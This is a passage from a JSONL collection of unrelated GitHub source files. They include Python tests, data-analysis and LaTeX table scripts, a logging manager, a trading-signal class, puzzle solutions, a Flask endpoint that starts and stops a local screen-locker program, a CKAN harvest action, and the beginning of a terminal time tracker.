self.assertTrue(M.is_valid())\n self.assertFalse('modulename' in M.errors)\n \n \n def test_model_generates_url(self):\n M = ModuleForm(example_module).save()\n resp = self.client.get(M.get_absolute_url())\n self.assertEqual(resp.context['module'].guid, M.guid)\n","repo_name":"Phaiax/openscad-seamlesslib-server","sub_path":"src/web/tests/modulemodel.py","file_name":"modulemodel.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25407756600","text":"def has_odd(input_set):\r\n if len(input_set) == 0:\r\n return False\r\n opt = False\r\n for element in input_set:\r\n if element % 2 == 1:\r\n opt = True\r\n return opt\r\n\r\n\r\nlist1 = {112, 10, 4, 6, 8}\r\nprint(has_odd(list1))","repo_name":"kran333/my_Encrypt_pro","sub_path":"PrinciplesOfProgramming/has_odd.py","file_name":"has_odd.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72698431914","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nimport json\nimport glob\nimport os\nimport re\n\nbase = \"exp/\"\npaths = glob.glob(base + \"preprocessing/*.json\")\ndata = [json.load(open(path)) for path in paths]\n\ndef path_to_graph(path):\n return {\n 'ger06': 'TDGer06',\n 'ptv17': 'TDEur17',\n 'ptv20': 'TDEur20',\n 'osm_europe': 'OSM Europe',\n 'osm_ger': 'OSM Germany',\n 'osm_ger_td': 'OSM Germany',\n 'europe': 'DIMACS Europe',\n }[[x for x in path.split('/') if x != ''][-1]]\n\ngraphs = pd.DataFrame.from_records([{\n **run,\n 'graph': path_to_graph(run['args'][1]),\n 'num_nodes': run['graph']['num_nodes'],\n 'num_edges': run['graph']['num_arcs'],\n} for run in data if 
'graph' in run])\n\nruntime_pattern = re.compile(\".*Needed (\\\\d+)musec\\\\..*\")\n\ndef parse_contraction_output(path):\n stats = { 'ch_contraction_running_time_s': 0.0 }\n\n with open(path, 'r') as f:\n for line in f:\n if not 'graph' in stats:\n stats['graph'] = path_to_graph(line.strip())\n else:\n match = runtime_pattern.match(line)\n if match:\n stats['ch_contraction_running_time_s'] += int(match[1]) / 1000000\n\n return stats\n\nch_preprocessing = pd.DataFrame.from_records([parse_contraction_output(path) for path in glob.glob(base + \"preprocessing/ch/*.out\")])\n\nruntime_pattern = re.compile(\".*running time : (\\\\d+)musec.*\")\n\ndef parse_flowcutter_partition_output(path):\n stats = { 'cch_ordering_running_time_s': 0.0 }\n\n with open(path, 'r') as f:\n for line in f:\n if not 'graph' in stats:\n stats['graph'] = path_to_graph(line.strip())\n else:\n match = runtime_pattern.match(line)\n if match:\n stats['cch_ordering_running_time_s'] += int(match[1]) / 1000000\n\n return stats\n\ncch_ordering = pd.DataFrame.from_records([parse_flowcutter_partition_output(path) for path in glob.glob(base + \"preprocessing/cch/*.out\")])\n\ntable = graphs.groupby(['graph'])[['basic_customization_running_time_ms', 'contraction_running_time_ms', 'graph_build_running_time_ms',\n 'perfect_customization_running_time_ms', 'respecting_running_time_ms', 'num_nodes', 'num_edges']].mean()\n\ntable = table.reindex(['OSM Germany', 'DIMACS Europe', 'TDGer06', 'TDEur17', 'TDEur20'])\n\ntable = table.join(ch_preprocessing.groupby('graph').mean()).join(cch_ordering.groupby('graph').mean())\ntable['num_nodes'] = table['num_nodes'] / 1000000.0\ntable['num_edges'] = table['num_edges'] / 1000000.0\ntable['cch_phase1_s'] = table['cch_ordering_running_time_s'] + (table['contraction_running_time_ms'] / 1000)\ntable['cch_phase2_s'] = (table['respecting_running_time_ms'] + table['basic_customization_running_time_ms'] + table['perfect_customization_running_time_ms'] + table['graph_build_running_time_ms']) / 1000\ntable = table.reindex(columns=['num_nodes', 'num_edges', 'ch_contraction_running_time_s', 'cch_phase1_s', 'cch_phase2_s'])\ntable = table.round(1)\n\nlines = table.to_latex(escape=False).split(\"\\n\")\n\nlines = lines[:2] + [\n R\" & & & \\multicolumn{3}{c}{Preprocessing [s]} \\\\ \\cmidrule(lr){4-6}\"\n R\" & Vertices & Edges & \\multirow{2}{*}{CH} & \\multicolumn{2}{c}{CCH} \\\\ \\cmidrule(lr){5-6}\"\n R\" & $[\\cdot 10^6]$ & $[\\cdot 10^6]$ & & Phase 1 & Phase 2 \\\\\"\n] + lines[4:]\n\noutput = \"\\n\".join(lines) + \"\\n\"\noutput = re.sub(re.compile('([0-9]{3}(?=[0-9]))'), '\\\\g<0>,\\\\\\\\', output[::-1])[::-1]\n\nwith open(\"paper/table/graphs.tex\", 'w') as f:\n f.write(output)\n","repo_name":"kit-algo/ch_potentials","sub_path":"eval/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"37647447770","text":"from datetime import datetime\nimport logging\nimport sys\nfrom typing import Union\n\nfrom pytz import timezone, utc\n\nfrom lcml.utils.context_util import joinRoot, jsonConfig\n\n\nDEFAULT_FORMAT = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\nTIME_MESSAGE_FORMAT = \"%(asctime)s - %(message)s\"\nMESSAGE_FORMAT = \"%(message)s\"\nDATE_FORMAT = \"%Y.%m.%d %H:%M:%S\"\n\nDEFAULT_BACKUPS = 20\nDEFAULT_MAX_BYTES = 50e7 # 50MB\n\n\n_levelNames = {\n logging.CRITICAL : 'CRITICAL',\n logging.ERROR : 'ERROR',\n logging.WARNING : 'WARNING',\n logging.INFO : 
'INFO',\n logging.DEBUG : 'DEBUG',\n logging.NOTSET : 'NOTSET',\n 'CRITICAL' : logging.CRITICAL,\n 'ERROR' : logging.ERROR,\n 'WARN' : logging.WARNING,\n 'WARNING' : logging.WARNING,\n 'INFO' : logging.INFO,\n 'DEBUG' : logging.DEBUG,\n 'NOTSET' : logging.NOTSET,\n}\n\n\ndef nameToLevel(name: Union[str, int]) -> int:\n \"\"\"Converts the English name for logging level to the logging module's\n internal integer code\"\"\"\n return _levelNames[name.upper()] if isinstance(name, str) else name\n\n\ndef levelToName(level: int) -> str:\n return _levelNames[level]\n\n\ndef getLogFormat(name: str) -> str:\n if name == \"message\":\n return MESSAGE_FORMAT\n elif name == \"time-message\":\n return TIME_MESSAGE_FORMAT\n else:\n return DEFAULT_FORMAT\n\n\nclass LoggingManager:\n \"\"\"Manages app logging configuration. Reads config file with following\n keys:\n 1) 'basicConfig' - values passed to `logging.basicConfig`\n 2) 'handlers' - handler definitions with 'type' attributes either 'stream'\n or 'file'\n 3) 'modules' - list of module specific logger level settings\n See `conf/common/logging.json` for an example\n \"\"\"\n # configuration used by manager, mainly for debugging\n _config = None\n\n @classmethod\n def initLogging(cls, fileName: str=None, fmt: str=None,\n config: dict=None):\n \"\"\"Initializes logging across app. Must be called before logger objects\n are created. Configuration read from\n `$LCML/conf/common/logging.json`.\n\n :param fileName: name of log file written to by FileHandler\n :param fmt: logger format override\n :param config: replacement for default logging config\n \"\"\"\n cls._config = config if config else jsonConfig(\"logging.json\")\n if cls._config.get(\"active\", True):\n # Python libraries may specify NullHandlers; however, this adds them\n # to the root logger. 
Its having 1 or more handlers effectively\n # prevents `logging.basicConfig()` from doing anything!\n # So to activate logging, these handlers must first be cleared\n logging.root.handlers = []\n\n # time-zone conversion\n tz = timezone(cls._config[\"tz\"])\n def localConverter(*args):\n return utc.localize(datetime.utcnow()).astimezone(tz).timetuple()\n logging.Formatter.converter = localConverter\n\n # set up kwargs for basicConfig()\n kwargs = cls._config[\"basicConfig\"]\n kwargs[\"level\"] = nameToLevel(kwargs[\"level\"])\n\n _format = getLogFormat(fmt if fmt else kwargs[\"format\"])\n kwargs[\"format\"] = _format\n\n # handlers\n handlers = []\n for defn in cls._config[\"handlers\"]:\n hdlrType = defn[\"type\"].lower()\n if hdlrType == \"stream\":\n hdlr = logging.StreamHandler(sys.stdout)\n hdlr.setLevel(nameToLevel(defn[\"level\"]))\n hdlr.setFormatter(logging.Formatter(_format))\n elif hdlrType == \"file\":\n fileName = fileName if fileName else defn[\"filename\"]\n fullFileName = joinRoot(\"logs\", fileName)\n hdlr = logging.FileHandler(filename=fullFileName,\n mode=defn.get(\"mode\", \"a\"))\n else:\n raise ValueError(\"bad handler type: \" + hdlrType)\n handlers.append(hdlr)\n\n kwargs[\"handlers\"] = handlers\n\n logging.basicConfig(**kwargs)\n\n # module-specific logger levels\n for setting in cls._config[\"modules\"]:\n level = nameToLevel(setting[\"level\"])\n logging.getLogger(setting[\"module\"]).setLevel(level)\n","repo_name":"lsst-epo/light_curve_ml","sub_path":"lcml/utils/logging_manager.py","file_name":"logging_manager.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"8711187615","text":"import unittest\nimport pandas as pd\nfrom trade_data_visualizer import process_data # assuming you have a function that processes data\n\nclass TestDataProcessing(unittest.TestCase):\n def setUp(self):\n self.data = [\n {\n \"Date\": \"2023-10-28\", \"Day\": \"Saturday\", \"Entry Time\": \"09:30\", \"Exit Time\": \"16:00\",\n \"Ticker Symbol\": \"AAPL\", \"Long/Short\": \"Long\", \"Entry Price\": 150,\n \"Exit Price\": 155, \"Number of Shares/Contracts\": 100, \"Stop-Loss Price\": 148,\n \"Take-Profit Price\": 160, \"Commission Paid\": 10, \"Trade Duration (minutes)\": 390,\n \"Profit/Loss\": 500, \"Trade Outcome\": \"Profit\", \"Strategy Used\": \"Breakout\"\n },\n # Add more data as needed\n ]\n\n def test_process_data(self):\n df = pd.DataFrame(self.data)\n processed_df = process_data(df) # assuming your function is named 'process_data'\n \n # Now you can write assertions based on what your 'process_data' function is supposed to do.\n # For example, if it's supposed to sort by date:\n self.assertTrue(pd.api.types.is_datetime64_any_dtype(processed_df['Date']))\n self.assertEqual(processed_df.iloc[0]['Date'], pd.Timestamp('2023-10-28'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"karthik-valliappan/Python-WebApp","sub_path":"test/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22285478975","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass Strategy(object):\r\n\r\n def __init__(self, series1: pd.DataFrame, series2: pd.DataFrame) -> None:\r\n super().__init__()\r\n\r\n self.series1 = series1\r\n self.series2 = series2\r\n\r\n self.frequency = None\r\n self.sigma_long_open = None\r\n 
self.sigma_long_close = None\r\n self.sigma_short_open = None\r\n self.sigma_short_close = None\r\n\r\n # output data\r\n self.signal = None\r\n\r\n def _set_parameters(self, \r\n frequency: int = 1, \r\n sigma_long_open: float = 1.25, \r\n sigma_long_close: float = 0.5, \r\n sigma_short_open: float = 1.25, \r\n sigma_short_close: float = 0.5, \r\n ) -> None:\r\n self.frequency = frequency\r\n self.sigma_long_open = sigma_long_open\r\n self.sigma_long_close = sigma_long_close\r\n self.sigma_short_open = sigma_short_open\r\n self.sigma_short_close = sigma_short_close\r\n\r\n def generate_signals(self) -> pd.DataFrame:\r\n '''\r\n generate the trading signals.\r\n 2: open long\r\n 1: close long \r\n 0: nothing\r\n -1: close short\r\n -2: open short\r\n '''\r\n\r\n # date alignment\r\n data = self._date_alignment(self.series1, self.series2)\r\n data['signal'] = 0\r\n\r\n # generate signals\r\n sigma = data['value'].std()\r\n\r\n position = 0\r\n for i in range(0, data.shape[0], self.frequency):\r\n if 0 == position and data.loc[data.index[i], 'value'] <= - self.sigma_long_open * sigma:\r\n position = 1\r\n data.loc[data.index[i], 'signal'] = 2\r\n if 1 == position and data.loc[data.index[i], 'value'] >= - self.sigma_long_close * sigma:\r\n position = 0\r\n data.loc[data.index[i], 'signal'] = 1\r\n \r\n position = 0\r\n for i in range(data.shape[0]):\r\n if 0 == position and data.loc[data.index[i], 'value'] >= self.sigma_short_open * sigma:\r\n position = 1\r\n data.loc[data.index[i], 'signal'] = -2\r\n if 1 == position and data.loc[data.index[i], 'value'] <= self.sigma_short_close * sigma:\r\n position = 0\r\n data.loc[data.index[i], 'signal'] = -1\r\n \r\n return data\r\n\r\n def _date_alignment(self, series1: pd.DataFrame, series2: pd.DataFrame) -> pd.DataFrame:\r\n series1 = series1.copy().rename(columns={'value':'value1'})\r\n series2 = series2.copy().rename(columns={'value':'value2'})\r\n\r\n series_aligned = pd.merge(series1, series2, left_index=True, right_index=True, how='inner')\r\n series_aligned['value'] = (series_aligned['value1'] - series_aligned['value2'])\r\n return series_aligned","repo_name":"HBhswl/ATCS_statistical_arbitrage","sub_path":"src/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40597597665","text":"with open('input05.txt', 'r') as f:\n input = [x.strip() for x in f.readlines()]\n\nboard = {}\n\nfor line in input:\n start, end = line.split(' -> ')\n s_x, s_y = [int(i) for i in start.split(',')]\n e_x, e_y = [int(i) for i in end.split(',')]\n\n s_x, e_x = min(s_x, e_x), max(s_x, e_x)\n s_y, e_y = min(s_y, e_y), max(s_y, e_y)\n\n # print(f'{s_x} {s_y} > {e_x} {e_y}')\n\n if s_x != e_x and s_y != e_y:\n continue\n\n for x in range(s_x, e_x+1):\n for y in range(s_y, e_y+1):\n if (x, y) in board:\n board[(x, y)] += 1\n else:\n board[(x, y)] = 1\n # print(f\"board element {x},{y} is now {board[(x,y)]}\")\n\nnum_intersect = sum([intersects >= 2 for intersects in board.values()])\n\nprint(num_intersect)\n\ndef visualize(board):\n for y in range(20):\n for x in range(20):\n if (x,y) in board:\n print(board[(x,y)], end='')\n print()\n\n# visualize(board)","repo_name":"dsoklic/AdventOfCode2021","sub_path":"05/05_1.py","file_name":"05_1.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23087090904","text":"from typing import 
List\nimport random\n\n\nclass PartitionRes:\n def __init__(self, left_size: int, mid_size: int):\n self.left_size: int = left_size\n self.mid_size: int = mid_size\n\n\ndef partition(v: List[int], start: int, end: int, pivot: int) -> PartitionRes:\n left = start\n right = end\n mid = start\n while mid <= right:\n if v[mid] < pivot:\n v[mid], v[left] = v[left], v[mid]\n mid += 1\n left += 1\n elif v[mid] > pivot:\n v[mid], v[right] = v[right], v[mid]\n right -= 1\n else:\n mid += 1\n return PartitionRes(left - start, right - left + 1)\n\n\ndef _get_elem_by_rnk(v: List[int], k: int, start: int, end: int) -> int:\n pivot = v[int(random.uniform(start, end + 1))]\n p = partition(v, start, end, pivot)\n left_size, mid_size = p.left_size, p.mid_size\n if k < left_size:\n return _get_elem_by_rnk(v, k, start, start + left_size - 1)\n elif k < left_size + mid_size:\n return pivot\n else:\n return _get_elem_by_rnk(v, k - left_size - mid_size, start + left_size + mid_size, end)\n\n\ndef get_elem_by_rnk(v: List[int], k: int) -> int:\n if k >= len(v):\n raise ValueError(\"k must be less than len(v)\")\n return _get_elem_by_rnk(v, k, 0, len(v) - 1)\n\n\ndef smallest_k(v: List[int], k: int) -> List[int]:\n if k <= 0 or k > len(v):\n raise ValueError(\"k must be in (0, len(v))\")\n threshold = get_elem_by_rnk(v, k - 1)\n smallest = list(filter(lambda x: x < threshold, v))\n return smallest + [threshold] * (k - len(smallest))\n\n\ndef ns(f):\n return next(f).strip()\n\n\ndef solve(fp: str):\n print(f\"# {fp}\")\n with open(fp) as f:\n n, k = map(int, ns(f).split())\n v = list(map(int, ns(f).split()))\n res = smallest_k(v, k)\n print(sorted(res))\n print()\n\n\nsolve(\"../testcases/17_14/01.txt\")\nsolve(\"../testcases/17_14/02.txt\")\nsolve(\"../testcases/17_14/03.txt\")\nsolve(\"../testcases/17_14/04.txt\")\n\n# # ../testcases/17_14/01.txt\n# [-5, -2, -1]\n\n# # ../testcases/17_14/02.txt\n# [-9, -7, -7, -3, -2, 0, 1, 3, 5, 6]\n\n# # ../testcases/17_14/03.txt\n# [-6, -6, -5, -5, -4, -4, -2, -1, -1, -1, 0, 0, 2, 3, 3, 4, 4, 4, 8, 8, 9, 11, 12, 12, 13, 13, 16, 16, 17, 17, 18, 21, 22, 23, 23, 24, 24, 24, 24, 25, 26, 28, 28, 29, 30, 31, 32, 33, 35, 40, 41, 41, 42, 43, 48, 49, 49, 50, 51, 51, 55, 55, 57, 58, 59, 59, 59, 61, 62, 62, 63, 64, 65, 65, 66, 67, 67, 68, 68, 70, 71, 71, 72, 75, 75, 75, 77, 77, 77, 78, 78, 79, 79, 80, 80, 80, 81, 83, 87, 89]\n\n# # ../testcases/17_14/04.txt\n# [0, 0, 0]\n","repo_name":"e5pe0n/algorithm-training","sub_path":"cracking_the_coding_interview_6th/chapter17/python/17_14_v05.py","file_name":"17_14_v05.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30571351572","text":"from DTPySide import *\nimport urllib3\nfrom pythonping import ping\n\ndef get_current_info(key):\n try:\n url='https://ipinfo.io/json'\n pool=urllib3.connection_from_url(url,timeout=1)\n r=pool.urlopen(\"GET\",\"/\")\n text=r.data.decode(\"utf-8\")\n res = json.loads(text)\n \n if res.get(\"error\"):\n # Rate Limit Error\n return \"Error\"\n \n if key==\"all\":\n return res\n else:\n return res[key]\n except:\n return \"Failed\"\n\ndef ping_ip(ip, count, timeout):\n try:\n res=ping(ip, count=count, timeout=timeout/1000)\n\n if res.stats_success_ratio:\n true_rtt_avg = (res.rtt_avg_ms*res.stats_packets_sent-res.stats_packets_lost*timeout)/res.stats_packets_returned\n else:\n true_rtt_avg = \"inf\"\n \n return true_rtt_avg, res.stats_success_ratio\n except:\n return \"inf\", 
-1\n","repo_name":"Holence/WireSock-GUI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"42031389003","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport openpyxl\nimport os\nimport sys\nimport time\nimport datetime\nsys.path.append('../')\nfrom BaseDatos import BaseDatos\nimport parseoDistrito\nimport ParseoMes\n\n# conexion a la bd y a la coleccion que queremos\nbd = BaseDatos.baseDatosClass()\ncon = bd.conexion()\nbdEstSeguridad = bd.conexionEstSeguridad(con)\nbdEstDetenidos = bd.conexionEstDetenidos(con)\nbdEstAccidentes = bd.conexionEstAccidentes(con)\n\n\n# Obtiene el archivo del que va a tomar los datos\nruta_app = './excel/' # obtiene ruta del script\ncontenido = os.listdir(ruta_app) # obtiene lista con archivos/dir \nroute = ruta_app + contenido[0]\n\n# doc = excel con los datos que queremos\ndoc = openpyxl.load_workbook(route)\nprint(doc)\n\ndoc.sheetnames\n# hojas del excel a examinar SEGURIDAD\nhoja = doc['SEGURIDAD']\n# hojas del excel a examinar DETENIDOS\nhoja2 = doc['DETENIDOS X DISTRITOS']\n# hojas del excel a examinar ACCIDENTES\nhoja3 = doc['ACCIDENTES']\n\nx = datetime.datetime.now()\nmes = x.month - 2\nprint(mes)\nm = ParseoMes.ParseoMesClass()\nprint(m.parseoMes(mes))\n\nseleccion = hoja['A4':'F24']\nfor filas in seleccion:\n for i in range(0,6):\n if i == 0:\n distrito = filas[i].value\n #print(\"Distrito: \" + distrito)\n if i == 1:\n personas = filas[i].value\n #print(\"Personas: \" + str(personas))\n if i == 2: \n patrimonio = filas[i].value\n #print(patrimonio)\n if i == 3:\n armas = filas[i].value\n #print(armas)\n if i == 4:\n ten_drogas = filas[i].value\n #print(ten_drogas)\n if i == 5:\n con_drogas = filas[i].value\n #print(con_drogas) \n d = parseoDistrito.ParseoDistritoClass() \n bd.insertarEstSeguridad(bdEstSeguridad, d.parseoDistrito(distrito), personas, patrimonio, armas, ten_drogas, con_drogas, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd EstSeguridad\")\n\nseleccion2 = hoja2['A4':'B24']\nfor filas in seleccion2:\n for i in range(0,2):\n if i == 0:\n distrito = filas[i].value\n #print(\"Distrito: \" + distrito)\n if i == 1:\n detenidos = filas[i].value\n #print(\"Detenidos: \" + str(detenidos))\n d = parseoDistrito.ParseoDistritoClass()\n bd.insertarEstDetenidos(bdEstDetenidos, d.parseoDistrito(distrito), detenidos, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd EstDetenidos\")\n\nseleccion3 = hoja3['A4:C24']\nfor filas in seleccion3:\n for i in range(0,3):\n if i == 0:\n distrito = filas[i].value\n if i == 1:\n conHeridos = filas[i].value\n if i == 2:\n sinHeridos = filas[i].value \n d = parseoDistrito.ParseoDistritoClass()\n bd.insertarEstAccidentes(bdEstAccidentes, d.parseoDistrito(distrito), conHeridos, sinHeridos, m.parseoMes(mes))\n\nprint(\"Datos insertados en la bd estAccidentes\")\n\n\n \n","repo_name":"MadAlert/TFG","sub_path":"Python/WebScraping/insertarDatosPolicia.py","file_name":"insertarDatosPolicia.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34781161216","text":"import json\nimport os\nfrom flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef ReadInstructionsFile():\n data = {}\n with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as f:\n data = json.load(f)\n return jsonify(data)\n\n\n# A route to 
# A route to store a lock instruction and launch the screen locker.\n@app.route('/', methods=['POST'])\ndef api_all():\n    request_data = request.get_json()\n    if validRequest(request_data):\n\n        # read the existing json into memory first, to preserve any existing data\n        with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as jsonfile:\n            json_content = json.load(jsonfile)  # kept in memory, usable outside the 'with' block\n\n        # update the instruction fields from the request body\n        json_content[\"target\"] = request_data[\"target\"]\n        json_content[\"message\"] = request_data[\"message\"]\n        json_content[\"status\"] = True\n        json_content[\"IsCloseAllowed\"] = False\n\n        with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'w') as jsonfile:\n            json.dump(json_content, jsonfile, indent=4)\n\n        os.startfile(\"C:\\\\Users\\\\Ringba\\\\py\\\\ScreenLocker.lnk\")\n        return \"True\"\n    else:\n        return \"False\"\n\n\n@app.route('/', methods=['DELETE'])\ndef api_kill():\n    # read the existing json into memory first, to preserve any existing data\n    with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'r') as jsonfile:\n        json_content = json.load(jsonfile)\n\n    json_content[\"status\"] = False\n    json_content[\"IsCloseAllowed\"] = True\n\n    with open(\"C:\\\\Users\\\\Ringba\\\\py\\\\instructions.json\", 'w') as jsonfile:\n        json.dump(json_content, jsonfile, indent=4)\n\n    os.system(\"taskkill /f /im ScreenLocker.exe\")\n    return \"True\"\n\n\ndef validRequest(reqObject):\n    if \"target\" in reqObject and \"message\" in reqObject:\n        return True\n    else:\n        return False\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"maxwellpalmeida/RemoteScreenLocker2","sub_path":"Listener/ScreenLocker.py","file_name":"ScreenLocker.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15111431899","text":"s = [int(input())]\r\n\r\ncnt = 1\r\nwhile True:\r\n    cnt += 1\r\n    if s[-1]%2==0:\r\n        add = s[-1]//2  # integer division keeps the sequence in ints\r\n    else:\r\n        add = s[-1]*3+1\r\n    if add in s:\r\n        print(cnt)\r\n        break\r\n    else:\r\n        s.append(add)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc116/B/4981062.py","file_name":"4981062.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
{"seq_id":"20671541031","text":"from collections import deque\n\n\nclass Solution:\n    def findClosestElements(self, arr: list[int], k: int, x: int) -> list[int]:\n        idx = self.closest_left_bin_search(arr, x)\n        print(idx)\n        if idx + 1 < len(arr) and abs(arr[idx] - x) > abs(arr[idx + 1] - x):\n            idx += 1\n        print(idx)\n        result = deque([arr[idx]])\n        res_l, res_r = idx - 1, idx + 1\n        while len(result) < k and res_l >= 0 and res_r < len(arr):\n            if abs(arr[res_l] - x) <= abs(arr[res_r] - x):\n                result.appendleft(arr[res_l])\n                res_l -= 1\n            else:\n                result.append(arr[res_r])\n                res_r += 1\n        \n        while len(result) < k and res_l >= 0:\n            result.appendleft(arr[res_l])\n            res_l -= 1\n        \n        while len(result) < k and res_r < len(arr):\n            result.append(arr[res_r])\n            res_r += 1\n        return result\n    \n    # in the end, finding the closest element is easier done by finding the last smaller number\n    def closest_left_bin_search(self, arr: list[int], target: int) -> int:\n        l = 0\n        r = len(arr) - 1\n        while l < r:\n            mid = (l + r + 1) // 2\n            if
arr[mid] > target:\n                r = mid - 1\n            else:\n                l = mid\n        return l\n    \n    # this also works, but e.g. for [1, 3], 2, 1 it returns 3 rather than 1, which is\n    # logically fine, but LeetCode requires 1 to be returned in that case\n    def bin_search(self, arr: list[int], target: int) -> int:\n        l = 0\n        r = len(arr) - 1\n        \n        while l < r:\n            mid = (l + r) // 2\n            if arr[mid] == target:\n                return mid\n            elif arr[mid] < target:\n                l = mid + 1\n            else:\n                r = mid - 1\n        return l\n\n\ns = Solution()\nprint(\n    s.bin_search(\n        [1, 4], 2,\n    ),\n)\n\n","repo_name":"AbdullaB1/leetcode","sub_path":"658. Find K Closest Elements.py","file_name":"658. Find K Closest Elements.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"32679458745","text":"import logging\n\nfrom ckan.logic import NotFound, check_access\n\nfrom ckanext.harvest.model import (HarvestSource, HarvestJob)\n\nlog = logging.getLogger(__name__)\n\ndef harvest_source_delete(context,data_dict):\n    log.info('Deleting harvest source: %r', data_dict)\n    check_access('harvest_source_delete',context,data_dict)\n\n    source_id = data_dict.get('id')\n    source = HarvestSource.get(source_id)\n    if not source:\n        log.warn('Harvest source %s does not exist', source_id)\n        raise NotFound('Harvest source %s does not exist' % source_id)\n\n    # Don't actually delete the record, just flag it as inactive\n    source.active = False\n    source.save()\n\n    # Abort any pending jobs\n    jobs = HarvestJob.filter(source=source,status=u'New')\n    if jobs:\n        log.info('Aborting %i jobs due to deleted harvest source', jobs.count())\n        for job in jobs:\n            job.status = u'Aborted'\n            job.save()\n\n    log.info('Harvest source %s deleted', source_id)\n    return True\n","repo_name":"datagovhr/data.gov.hr","sub_path":"src/ckanext-harvest/ckanext/harvest/logic/action/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"2746995025","text":"import cv2 as c \n\ncap = c.VideoCapture(2)\ncontador = 0\nwhile True:\n    _, frame = cap.read()\n    \n    k = c.waitKey(1)\n    if k == ord('q'):\n        break\n    elif k == ord('t'):\n        image_path = 'Frame_{}.jpg'.format(contador) \n        c.imwrite(image_path, frame)\n\n        contador += 1\n\n    c.imshow('frame', frame)\n    \ncap.release()  # release the capture device; 'frame' is a numpy array and has no release()\nc.destroyAllWindows()\n","repo_name":"denvars/reading_camera_opencv","sub_path":"readCamera.py","file_name":"readCamera.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"17143920759","text":"'''\nFun with time tracking!\n'''\nimport argparse\nimport logging\nimport re\nimport sys\nimport threading\nimport time\n\nfrom collections import namedtuple, defaultdict\nfrom datetime import datetime, timedelta\nfrom functools import wraps\n\n\narg_parser = argparse.ArgumentParser(description=__doc__)\narg_parser.add_argument('--debug', action='store_true')\narg_parser.add_argument('args', nargs='*')\n\nlogger = logging.getLogger('whelps.timetracker')\n\n\n# _find_getch came from this answer on stackoverflow.com\n# http://stackoverflow.com/a/21659588/344286\ndef _find_getch():\n    try:\n        import termios\n    except ImportError:\n        logger.debug('Not on POSIX platform, using msvcrt for getch')\n        # Non-POSIX.
Return msvcrt's (Windows') getch.\n import msvcrt\n @wraps(msvcrt.getch)\n def _getch():\n ch = msvcrt.getch() \n try:\n ch = ch.decode()\n except UnicodeDecodeError:\n if ch in ('\\000', '\\xe0'):\n ctrl = ch\n ch = msvcrt.getch()\n logger.info('%r was Windows control character'\n ' skipping %r', ctrl, ch)\n ch = ''\n else:\n logger.exception('Unable to decode chr %r', ch)\n ch = str(ch)\n return ch\n return _getch\n\n # POSIX system. Create and return a getch that manipulates the tty.\n import sys, tty\n def _getch():\n logger.debug('Storing off old settings')\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n logger.debug('Old settings have been restored')\n if ord(ch) == 3:\n raise KeyboardInterrupt('^C entered')\n if ord(ch) == 4:\n raise EOFError('EOF entered')\n return ch\n\n return _getch\n\ngetch = _find_getch()\n\nstart = datetime.now()\ntext = ''\n\n\ndef display(stopper, display_event):\n while not stopper.isSet():\n display_event.wait(timeout=1)\n display_event.clear()\n time_spent = datetime.now() - start\n s = int(time_spent.total_seconds())\n hours = s // 3600\n s = s - (hours*3600)\n minutes = s // 60\n seconds = s - (minutes*60)\n spent = '{:0>2}:{:0>2}:{:0>2}'.format(hours, minutes, seconds)\n\n if 